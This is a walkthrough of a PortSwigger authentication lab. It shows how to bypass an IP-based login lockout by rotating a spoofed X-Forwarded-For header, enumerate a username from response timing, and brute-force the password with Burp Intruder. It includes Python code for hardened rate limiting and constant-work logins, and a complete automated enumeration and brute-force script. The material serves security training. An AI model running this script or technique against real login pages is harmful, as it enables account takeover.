Username enumeration via response timing
To access the lab visit the following link:
This lab is vulnerable to username enumeration using its response times. To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.
- Your credentials:
wiener:peter
- Candidate usernames
- Candidate passwords
Click on the given button to access the lab
On the lab’s home page there is a “My account” link. Click it to reach the login form.
Log in with any fake credentials so that the login request can be captured in Burp. Here both the username and the password were set to “test”.
As soon as the form is submitted, the POST request appears in Burp’s HTTP history. Right-click it and send it to Repeater.
In Repeater we sent the request three times in a row. After that the response changed to: “You have made too many incorrect login attempts. Please try again in 30 minute(s).”
Let’s add the header x-forwarded-for: 1 to the request.
X-Forwarded-For is a de facto standard HTTP header that proxies and load balancers add to pass along the IP address of the client that connected to them, because the application behind the proxy only ever sees the proxy’s own address. Sending x-forwarded-for: 1 claims that the original client’s address is 1. That is not a complete IPv4 address (a real value would look like 203.0.113.195), but the application does not validate it: it takes whatever the header says as the client’s identity. Nothing stops a client from setting the header itself, so an application that uses it for a security decision is trusting attacker-controlled input.
Add x-forwarded-for: 1 to the request and send it again with the same username and password. The request is accepted, and we can send another three attempts before the lockout message comes back. Changing the header value again resets the counter once more.
This tells us two things. First, the application limits failed logins per source IP rather than per account: the username never changed, only the apparent IP did, so this is an IP-based rate limit rather than a true account lockout. Second, that limit is keyed on a header the client controls, so it can be bypassed by giving every request a different x-forwarded-for value. This is what lets us brute-force without being locked out.
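Why rotating the header works, as an added illustration rather than the lab’s own code: a login rate limiter keyed on whatever X-Forwarded-For says, next to one that only honours the header when the request really came through a known proxy. The attacker address and the trusted proxy set are constructed for the example; the three-attempt limit and 30-minute window are the values the lab reported.

```python
from collections import defaultdict

MAX_ATTEMPTS = 3            # lab behaviour: three failures, then a lockout
WINDOW_SECONDS = 30 * 60    # "try again in 30 minute(s)"

def naive_client_ip(remote_addr, headers):
    """Vulnerable: believes X-Forwarded-For from anyone, so the caller decides
    which key the rate limiter counts against."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else remote_addr

def hardened_client_ip(remote_addr, headers, trusted_proxies):
    """Only honour the header when the TCP peer is one of our own proxies, and
    then walk the chain from the right, skipping the proxies we trust: the
    rightmost remaining entry is the address the nearest trusted proxy saw.
    Anything further left was written by the client and is unverifiable."""
    if remote_addr not in trusted_proxies:
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    while hops and hops[-1] in trusted_proxies:
        hops.pop()
    return hops[-1] if hops else remote_addr

class LoginRateLimiter:
    """Counts failed logins per client key inside a sliding window."""
    def __init__(self, key_func):
        self.key_func = key_func
        self.failures = defaultdict(list)   # key -> timestamps of failures

    def allowed(self, remote_addr, headers, now):
        key = self.key_func(remote_addr, headers)
        self.failures[key] = [t for t in self.failures[key] if now - t < WINDOW_SECONDS]
        return len(self.failures[key]) < MAX_ATTEMPTS

    def record_failure(self, remote_addr, headers, now):
        self.failures[self.key_func(remote_addr, headers)].append(now)

def attempts_that_get_through(limiter, attacker_ip, rotate_header, n=10):
    """Send n bad logins from one real address, optionally with a different
    X-Forwarded-For on each; returns how many the limiter let through."""
    passed = 0
    for i in range(n):
        headers = {"X-Forwarded-For": str(i)} if rotate_header else {}
        if limiter.allowed(attacker_ip, headers, now=float(i)):
            passed += 1
            limiter.record_failure(attacker_ip, headers, now=float(i))
    return passed

# Constructed addresses for the demonstration (hypothetical, not the lab's).
ATTACKER = "198.51.100.7"
TRUSTED_PROXIES = {"10.0.0.2"}

def demo():
    hardened_key = lambda ra, h: hardened_client_ip(ra, h, TRUSTED_PROXIES)
    return {
        "naive, no header": attempts_that_get_through(LoginRateLimiter(naive_client_ip), ATTACKER, False),
        "naive, rotating header": attempts_that_get_through(LoginRateLimiter(naive_client_ip), ATTACKER, True),
        "hardened, rotating header": attempts_that_get_through(LoginRateLimiter(hardened_key), ATTACKER, True),
    }

if __name__ == "__main__":
    print(demo())  # {'naive, no header': 3, 'naive, rotating header': 10, 'hardened, rotating header': 3}
```

The naive limiter lets all ten attempts through as soon as the header changes per request, which is exactly what Repeater showed. The hardened version ignores the header unless the connection came from a listed proxy, so the attacker is back to three attempts per real address. Frameworks usually expose this as a “trusted proxies” or “proxy fix” setting; leaving it unset is the misconfiguration the lab models.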
We know wiener’s credentials, so we can compare the response time for a correct username with a wrong password. Change the username to wiener in Repeater and send the request again.
The response now takes noticeably longer. The username exists, so the application goes on to check the password, and that check (most likely a deliberately slow password hash) is where the extra time is spent.
The response time is shown at the bottom right of the Burp window.
Now send the request with an incorrect username and an incorrect password.
With an incorrect username the application responds almost immediately. It validates the username first and skips the password check entirely when the user does not exist, so the response is shorter. Using a long password makes the difference easier to spot, because the password check takes longer the more input it has to process. The difference is measured over the network and is subject to jitter, so confirm a single measurement by repeating it before drawing conclusions.
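The server-side difference behind those two measurements, as an added example (the lab’s source is not public, so this is not its code): a login that returns early for unknown usernames, beside one that does the same amount of work either way. The user store, salt and iteration count are constructed, and PBKDF2 stands in for whatever hash the lab uses; the point is that the slow step only runs on one branch.

```python
import hashlib
import hmac
import os
import statistics
import time

# Constructed user store: one account, password hashed with a deliberately
# slow KDF so the work the server does (or skips) is measurable.
ITERATIONS = 100_000
SALT = os.urandom(16)

def kdf(password, salt=SALT):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

USERS = {"wiener": kdf("peter")}
# Hash of a random password: lets the hardened path do a full KDF for
# unknown usernames too, so both branches cost the same.
DUMMY_HASH = kdf(os.urandom(16).hex())

def vulnerable_login(username, password):
    """Looks the user up first and returns early when absent. The KDF only
    runs for real usernames, so response time reveals which names exist."""
    stored = USERS.get(username)
    if stored is None:
        return False
    return hmac.compare_digest(kdf(password), stored)

def hardened_login(username, password):
    """Always runs the KDF, against the dummy hash when the user is unknown,
    so an unknown username costs the same as a known one with a bad password."""
    stored = USERS.get(username, DUMMY_HASH)
    ok = hmac.compare_digest(kdf(password), stored)
    return ok and username in USERS

def median_seconds(login, username, password, rounds=3):
    """Median wall-clock time of `rounds` calls: what Burp's Response received
    column shows, minus the network."""
    samples = []
    for _ in range(rounds):
        t0 = time.perf_counter()
        login(username, password)
        samples.append(time.perf_counter() - t0)
    return statistics.median(samples)

if __name__ == "__main__":
    long_pw = "x" * 100
    for login in (vulnerable_login, hardened_login):
        print(login.__name__,
              "valid user: %.4fs" % median_seconds(login, "wiener", long_pw),
              "unknown user: %.4fs" % median_seconds(login, "nobody", long_pw))
```

Run it and the vulnerable function answers an unknown username in microseconds but takes tens of milliseconds for wiener; the hardened one takes the same tens of milliseconds for both. The fix is not to make the lookup slower but to make the cost independent of the secret being probed; a uniform error message and a rate limit that is not keyed on client-supplied headers complete the picture.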
To brute-force the username, send this request to Intruder: right-click it and select “Send to Intruder”.
In the Intruder Positions tab set the attack type to Pitchfork. Pitchfork takes several payload sets and walks through them in parallel: the first request uses the first payload of every set, the second request uses the second payload of every set, and so on, stopping when the shortest set runs out. Here that lets us pair each candidate username with a fresh x-forwarded-for value, so no per-IP counter ever reaches three and we are not locked out during the attack.
Click “Clear §” to remove the automatic payload positions. Highlight the value of the x-forwarded-for header and click “Add §” to mark it as a payload position; it will be surrounded by § symbols.
Highlight the value of the username parameter and click “Add §” to mark it as the second payload position.
Navigate to the “Payloads” tab in Intruder.
In the “Payload sets” section make sure “Payload set 1” is selected; it corresponds to the first position you marked, the x-forwarded-for value.
Set the payload type to “Numbers”.
In the payload options generate numbers from 0 to 100 with a step of 1. The values only have to be different for every request, and Pitchfork stops when the shorter list (the 100 usernames) is exhausted, so 101 numbers is more than enough.
PortSwigger provides the candidate username list on the lab page.
In the “Payload sets” section select “Payload set 2”, which corresponds to the username position.
Set the payload type to “Simple list”.
Copy the list of usernames from the lab page and paste it into the payload options.
With both payload sets configured, click “Start attack”.
Burp Suite sends one request per username, each with a different x-forwarded-for value, and lists the results in the attack window.
Sort the results by the “Response received” column (the time in milliseconds until the response arrived). One request should stand out with a much higher value than the rest; as we saw in Repeater, the password check only runs when the username exists, so this is very likely the valid username. If the outlier is not clear, run the attack again and look for the username that is slow in both runs.
Now we brute-force that user’s password with the provided list. Go back to the Intruder tab.
Click “Clear §” to remove the previous payload positions. Highlight the value of the x-forwarded-for header and click “Add §” to mark it as a payload position; it will be surrounded by § symbols.
Set the username parameter to the name identified above, then highlight the value of the password parameter and click “Add §” to mark it as the second payload position.
Navigate to the “Payloads” tab in Intruder.
In the “Payload sets” section make sure “Payload set 1” is selected, corresponding to the x-forwarded-for position.
Set the payload type to “Numbers”.
In the payload options generate numbers from 306 to 406 with a step of 1. We pick a range that was not used in the username attack because the application is still counting the failures recorded against those earlier values; fresh values keep every request well clear of the three-attempt limit.
PortSwigger provides the candidate password list on the lab page.
In the “Payload sets” section select “Payload set 2”, which corresponds to the password position.
Set the payload type to “Simple list”.
Copy the list of passwords from the lab page and paste it into the payload options.
With both payload sets configured, click “Start attack”.
Burp Suite sends one request per candidate password, each with its own x-forwarded-for value, and lists the results in the attack window.
Sort the results by the “Status code” column. Every wrong password gets a 200 with the login page again, but one request got a 302: the application redirected to the account page instead of re-rendering the form, so that is the correct password. The same row also stands out in the “Length” column, which is a second signal worth checking.
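The two Intruder runs above (username enumeration by response time with a rotating x-forwarded-for value, then the password brute force watching for a 302) as one script, added here and not part of the original walkthrough. The lab needs a live instance, so the script includes a small constructed stand-in server that behaves the way the walkthrough observed: a three-failure limit keyed on the header, a slow password check only for existing users, and a 302 on success. The account name, password and candidate lists are invented; to use the attack functions against the real lab, pass post_login the lab’s login URL and the lists from the lab page instead.

```python
import statistics
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer

# ---- Constructed stand-in for the lab so the script runs offline ----------
# These values are invented for the demo; the real lab's account differs.
VALID_USER, VALID_PASS = "carlos", "montoya"
LOCKOUT_AFTER = 3                 # lab: three failures, then a lockout message
failures = Counter()              # failed attempts per *reported* client IP

class LabStub(BaseHTTPRequestHandler):
    def log_message(self, *_):    # keep the demo quiet
        pass

    def do_POST(self):
        body = self.rfile.read(int(self.headers["Content-Length"]))
        form = dict(urllib.parse.parse_qsl(body.decode()))
        # Same mistake as the lab: the rate-limit key comes from the header.
        ip = self.headers.get("X-Forwarded-For", self.client_address[0])
        if failures[ip] >= LOCKOUT_AFTER:
            return self._reply(200, "You have made too many incorrect login attempts.")
        if form.get("username") == VALID_USER:
            time.sleep(0.2)       # the slow password check only runs for real users
            if form.get("password") == VALID_PASS:
                return self._reply(302, "", location="/my-account")
        failures[ip] += 1
        self._reply(200, "Invalid username or password.")

    def _reply(self, code, text, location=None):
        self.send_response(code)
        if location:
            self.send_header("Location", location)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(text.encode())

def start_stub():
    srv = HTTPServer(("127.0.0.1", 0), LabStub)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/login"

# ---- The attack: what the two Intruder pitchfork runs did -----------------
class KeepRedirects(urllib.request.HTTPRedirectHandler):
    """Hand a 302 back to the caller instead of following it, as Burp does."""
    def http_error_302(self, req, fp, code, msg, headers):
        return fp
    http_error_301 = http_error_303 = http_error_307 = http_error_302

OPENER = urllib.request.build_opener(KeepRedirects)

def post_login(url, username, password, xff):
    """One login attempt; returns (status, body, seconds until the response)."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, headers={"X-Forwarded-For": xff})
    t0 = time.perf_counter()
    try:
        resp = OPENER.open(req)
        status, body = resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read().decode()
    return status, body, time.perf_counter() - t0

def enumerate_username(url, candidates):
    """Pitchfork run 1: each candidate gets a fresh X-Forwarded-For value, so no
    per-IP counter reaches the lockout; a long password amplifies the delay.
    Returns the clear timing outlier, or None if no name stands out."""
    timings = {}
    for i, name in enumerate(candidates):
        _, body, elapsed = post_login(url, name, "x" * 100, xff=str(i))
        if "too many" in body:
            raise RuntimeError(f"locked out while testing {name}")
        timings[name] = elapsed
    slowest = max(timings, key=timings.get)
    return slowest if timings[slowest] > 3 * statistics.median(timings.values()) else None

def brute_force_password(url, username, candidates, xff_start=306):
    """Pitchfork run 2: a header range not used in run 1; a 302 redirect to the
    account page marks the correct password."""
    for i, pw in enumerate(candidates):
        status, _, _ = post_login(url, username, pw, xff=str(xff_start + i))
        if status == 302:
            return pw
    return None

def run():
    srv, url = start_stub()
    try:
        usernames = ["admin", "alice", "bob", "carlos", "dave", "eve", "root"]  # constructed
        passwords = ["123456", "password", "letmein", "montoya", "qwerty"]     # constructed
        user = enumerate_username(url, usernames)
        password = brute_force_password(url, user, passwords) if user else None
        return user, password
    finally:
        srv.shutdown()
        srv.server_close()

if __name__ == "__main__":
    print(run())   # ('carlos', 'montoya')
```

Two details carry over to the real lab. The outlier test compares the slowest request against the median rather than just taking the maximum, which is the manual step of asking whether the top row is really far from the rest; against a network target, run enumerate_username twice and keep the name that wins both. And the redirect handler matters: a client that silently follows the 302 would report a 200 for the correct password and hide the very signal the Intruder status-code column showed.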
Go back to the login page and log in with the username and password we identified.
We are logged in, and the lab is marked as solved.
Congratulations! The walkthrough of the fifth authentication lab finishes here.
You can see the walkthrough of the sixth lab by clicking the following link: